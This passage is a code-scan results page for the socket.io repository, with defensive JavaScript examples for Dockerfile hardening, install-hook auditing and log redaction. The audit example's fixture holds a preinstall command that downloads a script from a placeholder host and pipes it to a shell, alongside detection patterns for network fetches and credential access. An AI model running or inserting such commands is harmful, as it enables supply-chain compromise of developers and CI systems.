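The two Dockerfile findings on this page, the final stage that never drops root (both the "Docker final stage has no non-root USER" and "Dockerfile runs as root" entries above) and the tag-pinned but not digest-pinned base image, are checked together below. This is an added example, not socket.io's own build tooling: it splits a Dockerfile into stages, looks at the `USER` of the last one and tests every external `FROM` for an `@sha256:` digest. Both Dockerfiles are constructed; the `node:20-alpine` tag is illustrative and the digest is a placeholder, since a real one comes from `docker pull` or `docker inspect`.

```javascript
// Added example (not socket.io code): lint Dockerfile text for a root final
// stage and for base images that carry no digest.
const DIGEST_RE = /@sha256:[0-9a-f]{64}$/;

// Split a Dockerfile into stages, each with its base image and last USER.
function parseStages(text) {
  const stages = [];
  // Join backslash continuations so each instruction is one logical line.
  for (const raw of text.replace(/\\\r?\n/g, ' ').split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#')) continue;
    const [instr, ...rest] = line.split(/\s+/);
    if (instr.toUpperCase() === 'FROM') {
      // FROM [--platform=...] <image> [AS <name>]
      const parts = rest.filter((p) => !p.startsWith('--'));
      const asIdx = parts.findIndex((p) => p.toUpperCase() === 'AS');
      stages.push({ image: parts[0], name: asIdx >= 0 ? parts[asIdx + 1] : null, user: null });
    } else if (instr.toUpperCase() === 'USER' && stages.length) {
      stages[stages.length - 1].user = rest.join(' ');
    }
  }
  return stages;
}

// Docker defaults to root; `USER root`, `USER 0` and `USER 0:0` are root too.
function isRootUser(user) {
  if (user === null) return true;
  const name = user.split(':')[0].trim();
  return name === '' || name === 'root' || name === '0';
}

function lintDockerfile(text) {
  const stages = parseStages(text);
  const findings = [];
  if (!stages.length) return findings;
  const aliases = new Set(stages.map((s) => s.name).filter(Boolean));
  const final = stages[stages.length - 1];
  if (isRootUser(final.user)) {
    findings.push({ check: 'final-stage-root', detail: final.user ?? '(no USER)' });
  }
  for (const s of stages) {
    // `scratch` and references to earlier stages have nothing to pin.
    if (s.image === 'scratch' || aliases.has(s.image)) continue;
    if (!DIGEST_RE.test(s.image)) findings.push({ check: 'no-digest', detail: s.image });
  }
  return findings;
}

// Constructed Dockerfiles: the shape the findings describe, then a hardened one.
const BEFORE = `
FROM node:14-alpine AS build
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
RUN npm run build

FROM node:14-alpine
WORKDIR /app
COPY --from=build /app/dist ./dist
CMD ["node", "dist/index.js"]
`;

// Placeholder digest with the right shape; substitute the real one for the image you reviewed.
const DIGEST = 'sha256:' + '0123456789abcdef'.repeat(4);
const AFTER = `
FROM node:20-alpine@${DIGEST} AS build
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
RUN npm run build

FROM node:20-alpine@${DIGEST}
WORKDIR /app
RUN addgroup -S app && adduser -S app -G app
COPY --from=build --chown=app:app /app/dist ./dist
USER app
CMD ["node", "dist/index.js"]
`;

console.log(lintDockerfile(BEFORE)); // 3 findings; lintDockerfile(AFTER) is empty
```

Only the final stage's `USER` matters for the running container, which is why build stages may keep root for `npm ci` while the runtime stage drops it. Pinning by digest freezes the exact image layers; it therefore has to be paired with a process (Dependabot or a scheduled rebuild) that bumps the digest, or the pin quietly becomes an unpatched base.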
low System graph software Dead code candidate conf 1.00 50 occurrences File has no detected symbols
Source file with no class/function declarations: possible config, dead code, or scratch file. Read this group with its false-positive rate in mind. The detector only counts class and function declarations, so it reports files that are legitimately declaration-free: test files (typically top-level `describe`/`it` calls), build and test configuration (`babel.config.js`, `rollup.config.*.js`, `wdio.conf.js`), protocol test-suite fixtures, entry points that only re-export, and TypeScript files whose names indicate they carry only `interface`/`type` declarations (`typed-events.ts`, `adapter-types.ts`, `socket-types.ts`). The entries worth a manual look are the few that neither a test runner nor an import obviously references.
50 files, 50 locations
docs/engine.io-protocol/v3-test-suite/node-imports.js
docs/engine.io-protocol/v4-test-suite/node-imports.js
docs/socket.io-protocol/v5-test-suite/node-imports.js
packages/engine.io-client/test/arraybuffer/polling.js
packages/engine.io-client/test/arraybuffer/ws.js
packages/engine.io-client/test/binary-fallback.js
packages/engine.io-client/test/engine.io-client.js
packages/engine.io-client/test/fixtures/unref.js
packages/engine.io-client/test/parseuri.js
packages/engine.io-client/test/socket.js
packages/engine.io-client/test/transport.js
packages/engine.io-client/test/util.js
packages/engine.io-client/test/xmlhttprequest.js
packages/engine.io-parser/lib/commons.ts
packages/engine.io-parser/test/browser.ts
packages/engine.io-parser/test/node.ts
packages/engine.io/examples/memory-usage-webtransport/client.js
packages/engine.io/examples/memory-usage/client.js
packages/engine.io/test/fixtures/server-close-upgraded.js
packages/engine.io/test/fixtures/server-close-upgrading.js
packages/engine.io/test/fixtures/server-close.js
packages/engine.io/test/middlewares.js
packages/engine.io/test/parser.js
packages/socket.io-client/babel.config.js
packages/socket.io-client/lib/browser-entrypoint.ts
packages/socket.io-client/support/rollup.config.esm.js
packages/socket.io-client/support/rollup.config.umd.js
packages/socket.io-client/support/rollup.config.umd.msgpack.js
packages/socket.io-client/test/connection-state-recovery.ts
packages/socket.io-client/test/fixtures/no-unref.ts
packages/socket.io-client/test/fixtures/unref-during-reconnection.ts
packages/socket.io-client/test/fixtures/unref-polling-only.ts
packages/socket.io-client/test/fixtures/unref-websocket-only.ts
packages/socket.io-client/test/fixtures/unref.ts
packages/socket.io-client/test/retry.ts
packages/socket.io-client/test/support/hooks.ts
packages/socket.io-client/test/typed-events.test-d.ts
packages/socket.io-client/test/url.ts
packages/socket.io-client/wdio.conf.js
packages/socket.io-cluster-engine/test/redis.ts
packages/socket.io-cluster-engine/test/worker.js
packages/socket.io-postgres-emitter/lib/typed-events.ts
packages/socket.io-redis-streams-emitter/lib/adapter-types.ts
packages/socket.io-redis-streams-emitter/lib/typed-events.ts
packages/socket.io/lib/socket-types.ts
packages/socket.io/test/fixtures/server-close.ts
packages/socket.io/test/middleware.ts
packages/socket.io/test/socket-middleware.ts
packages/socket.io/test/socket-timeout.ts
packages/socket.io/test/v2-compatibility.ts
low System graph quality Integrity conf 1.00 Old/deprecated-named symbol `io_v2` in packages/socket.io/test/v2-compatibility.ts:4
Names with suffixes like `_old`, `_v1`, `_deprecated` usually indicate replaced-but-not-removed code (a typical AI-coder leftover). Confirm and delete, or rename if it is the active version. Caveat for this hit: the file is the v2 compatibility test, so `io_v2` most likely names a client of the older protocol version kept on purpose to exercise compatibility with v2 clients. That is a legitimate use of a version suffix, not a leftover, and deleting it would remove the test.
old marker · Dead code
low System graph cicd CI/CD security conf 1.00 package.json defines install-time lifecycle scripts
preinstall/install/postinstall/prepare scripts run with the installing user's privileges during `npm install`, on developer laptops and in CI alike, which is why they are the usual vehicle for malicious or compromised packages. Review any such script for network calls, obfuscation, shell execution, or credential access, and diff it whenever the dependency changes. In CI, `npm ci --ignore-scripts` disables all of them; opt back in only for the packages that genuinely need a build step. Caveat: this hit is in an example project (`examples/nuxt-example/package.json`), not in a published socket.io package, so it affects people who install the example rather than consumers of the library.
examples/nuxt-example/package.json
CI/CD security · Supply chain · Npm
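The review the finding asks for, as an added example (not part of the scan engine or of socket.io): list the install-time hooks in a package.json and mark the ones that show the patterns a reviewer would stop on. The package.json is constructed for the demo; its suspicious `preinstall` points at the reserved `.invalid` TLD and is never executed, only inspected.

```javascript
// Added example (not part of the scan or of socket.io): audit the lifecycle
// hooks of a package.json before `npm install` runs them.
// Hooks that `npm install` executes for a package being installed.
const INSTALL_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'prepublish', 'preprepare', 'prepare', 'postprepare',
];

// Patterns worth a stop. A hit is a reason to read the script, not proof of malice.
const RED_FLAGS = [
  [/\b(curl|wget|fetch)\b/i, 'downloads from the network'],
  [/\|\s*(sh|bash|zsh)\b/, 'pipes content into a shell'],
  [/\bnode\s+-e\b|\beval\s*\(/, 'evaluates inline code'],
  [/base64|atob\s*\(|\\x[0-9a-f]{2}/i, 'encoded or obfuscated payload'],
  [/child_process|execSync|\bspawn\b/, 'spawns processes from JavaScript'],
  [/\.npmrc|\.ssh\b|\.aws\b|\.git-credentials|\$\{?(NPM_TOKEN|GITHUB_TOKEN|AWS_)/, 'touches credentials'],
  [/\bchmod\b|\bsudo\b|\/etc\//, 'modifies the system outside the project'],
];

// One entry per install-time hook present: { hook, command, flags: [reason, ...] }.
function auditLifecycleScripts(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({
      hook,
      command: scripts[hook],
      flags: RED_FLAGS.filter(([re]) => re.test(scripts[hook])).map(([, why]) => why),
    }));
}

// Only the hooks that tripped at least one pattern.
function suspiciousHooks(packageJsonText) {
  return auditLifecycleScripts(packageJsonText).filter((e) => e.flags.length > 0);
}

// Human-readable lines for a PR comment or CI log.
function describe(packageJsonText) {
  return auditLifecycleScripts(packageJsonText).map((e) =>
    `${e.hook}: ${e.command}` + (e.flags.length ? `  <-- ${e.flags.join('; ')}` : '')
  );
}

// Constructed package.json for the demo. `test` is not an install hook and is ignored.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'demo-app',
  scripts: {
    preinstall: 'curl -s https://updates.example.invalid/setup.sh | sh',
    postinstall: 'node scripts/generate-types.js',
    test: 'mocha',
  },
});

console.log(describe(SAMPLE_PACKAGE_JSON).join('\n'));
```

The same audit applies to every dependency's package.json under `node_modules`, which is where the real risk sits; running it on the lockfile's resolved packages after `npm ci --ignore-scripts`, before enabling scripts for the few that need them, gives the review a fixed target.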
low System graph frontend Frontend quality conf 1.00 36 occurrences Stray `console.log` in TS/JS
Debug output written to stdout is easy to forget and easy to leak: in a Socket.IO server the convenient things to dump (the handshake, its `auth` payload, cookies, session IDs, whole message bodies) are exactly what should never reach a log aggregator. The canned remediation ("replace with the toast helper or an error boundary") only makes sense for browser code; most hits below are Node.js server or client scripts under `examples/`, where the fix is a structured logger with explicit field redaction, or simply removing the statement. The `express-session-example`, `passport-example` and `passport-jwt-example` hits deserve the first look, since those files handle sessions and credentials. `console.warn` / `console.error` are acceptable. Why: Hygiene. Rule id: fq.console-leak
36 files, 36 locations
examples/basic-crud-application/server-postgres-cluster/lib/cluster.js:7
examples/basic-websocket-client/check-bundle-size.js:17
examples/chat/index.js:10
examples/client-side-load-balancing-example/index.js:31
examples/cluster-engine-node-cluster/client.js:12
examples/cluster-engine-node-cluster/server.js:16
examples/cluster-engine-redis/client.js:12
examples/cluster-haproxy/server/index.js:13
examples/cluster-httpd/server/index.js:13
examples/cluster-nginx/client/index.js:4
examples/cluster-nginx/server/index.js:16
examples/cluster-traefik/server/index.js:14
examples/connection-state-recovery-example/cjs/index.js:32
examples/connection-state-recovery-example/esm/index.js:32
examples/create-react-app-example/server.js:8
examples/create-react-app-example/src/serviceWorker.js:44
examples/custom-parsers/src/client1.js:4
examples/custom-parsers/src/client2.js:7
examples/custom-parsers/src/client3.js:7
examples/custom-parsers/src/client4.js:7
examples/custom-parsers/src/server.js:10
examples/es-modules/client.js:7
examples/es-modules/server.js:6
examples/expo-example/server/index.js:10
examples/express-session-example/cjs/index.js:65
examples/express-session-example/esm/index.js:64
examples/express-session-example/ts/index.ts:71
examples/http2-example/index.js:31
examples/nextjs-app-router/server.js:27
examples/nextjs-pages-router/server.js:27
examples/nwjs-example/index.js:12
examples/nwjs-example/server/index.js:6
examples/passport-example/cjs/index.js:59
examples/passport-example/esm/index.js:62
examples/passport-example/ts/index.ts:73
examples/passport-jwt-example/cjs/index.js:38
Fq console leak
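What "easy to leak debug output" looks like in a Socket.IO server, and the hardened form next to it, as an added example that is not part of the scan engine or of socket.io. The handshake object is constructed for the demo; its shape (`headers`, `auth`, `query`, `address`) mirrors what a server sees on `socket.handshake`, but every value is made up, the IP is from the documentation range and the tokens are placeholders.

```javascript
// Added example (not part of the scan or of socket.io): a leak-prone log line
// beside a redacting logger that keeps tokens and cookies out of stdout.

// Field names that are never logged. Keys are compared after lowercasing and
// stripping '-' and '_', so `Set-Cookie` and `access_token` are both caught.
const SENSITIVE_KEYS = new Set([
  'authorization', 'cookie', 'setcookie', 'token', 'accesstoken', 'refreshtoken',
  'password', 'secret', 'apikey', 'sessionid', 'sid',
]);
// Inline bearer tokens inside free-text values (e.g. a copied header line).
const BEARER_RE = /\bBearer\s+[A-Za-z0-9\-._~+/]+=*/g;

function normalizeKey(key) {
  return key.toLowerCase().replace(/[-_]/g, '');
}

// Deep-copy `value`, replacing sensitive fields and bearer tokens. The input
// is never mutated; cycles are cut so a circular object cannot hang the logger.
function redact(value, seen = new WeakSet()) {
  if (typeof value === 'string') return value.replace(BEARER_RE, 'Bearer [REDACTED]');
  if (value === null || typeof value !== 'object') return value;
  if (seen.has(value)) return '[Circular]';
  seen.add(value);
  if (Array.isArray(value)) return value.map((v) => redact(v, seen));
  const out = {};
  for (const [k, v] of Object.entries(value)) {
    out[k] = SENSITIVE_KEYS.has(normalizeKey(k)) ? '[REDACTED]' : redact(v, seen);
  }
  return out;
}

// Leak-prone: the pattern the finding flags. The whole handshake, cookies and
// auth payload included, goes to stdout and from there to any log shipper.
function leakyLogLine(handshake) {
  return 'new connection ' + JSON.stringify(handshake);
}

// Hardened: one JSON line per event with a fixed event name, a timestamp and
// the handshake passed through redact(). Structured output also keeps a
// crafted query string from injecting fake log lines.
function safeLogLine(event, handshake, now = new Date(0)) {
  return JSON.stringify({ ts: now.toISOString(), event, ...redact(handshake) });
}

// Constructed handshake; shape mirrors socket.handshake, values are made up.
const SAMPLE_HANDSHAKE = {
  headers: {
    host: 'chat.example.test',
    cookie: 'connect.sid=s%3Aconstructed.sig',
    authorization: 'Bearer constructed.header.token',
  },
  auth: { token: 'tok_constructed_123', username: 'alice' },
  query: { room: 'general' },
  address: '203.0.113.7',
};

console.log(leakyLogLine(SAMPLE_HANDSHAKE));
console.log(safeLogLine('connection', SAMPLE_HANDSHAKE));
```

In a real server the call site is `io.on('connection', (socket) => log('connection', socket.handshake))`; the point is that redaction happens in the logger, once, rather than at each of the 36 call sites listed above.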

Showing first 300 of 353. Refine filters or use the findings page for deep search.

API access

This page is publicly accessible at: https://repobility.com/scan/4d28810e-b8c1-47a9-b235-f60f50ca4517/

To check status programmatically (no auth required):

curl -s https://repobility.com/api/v1/public/scan/4d28810e-b8c1-47a9-b235-f60f50ca4517/

Important — please don't re-submit the same URL repeatedly. The submission endpoint is idempotent: re-submitting the same git URL returns this same scan_token, not a new one. To re-scan this repo, sign up free and use the dashboard.